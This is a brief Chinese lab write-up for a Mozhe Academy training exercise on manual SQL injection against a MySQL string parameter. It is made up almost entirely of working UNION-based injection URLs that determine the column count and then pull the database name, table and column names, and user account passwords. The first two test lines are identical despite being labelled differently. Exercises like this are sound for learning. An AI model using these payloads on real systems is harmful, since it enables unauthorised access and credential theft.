声明
环境
墨者学院-SQL手工注入漏洞测试(MySQL数据库-字符型)
判断是否存在漏洞
http://124.70.64.48:42937/new_list.php?id=tingjigonggao' and '1'='2'--+
and '1'='1'正常
http://124.70.64.48:42937/new_list.php?id=tingjigonggao' and '1'='2'--+
and '1'='2'出错,存在字符型注入漏洞
判断字段数
http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,3,4 --+字段数判断为4 
爆数据库
http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,database(),4 --+爆出数据库mozhe_discuz_stormgroup
http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name = 'stormgroup_member'--+爆表
http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema = 'mozhe_discuz_stormgroup'--+爆出数据表notice和stormgroup_member,分析stormgroup_member表包含账号密码
爆字段
http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name = 'stormgroup_member'--+爆出表stormgroup_member的所有字段id、name、password、status
爆数据
http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(id,',',name,',',password),4 from stormgroup_member where id=1--+
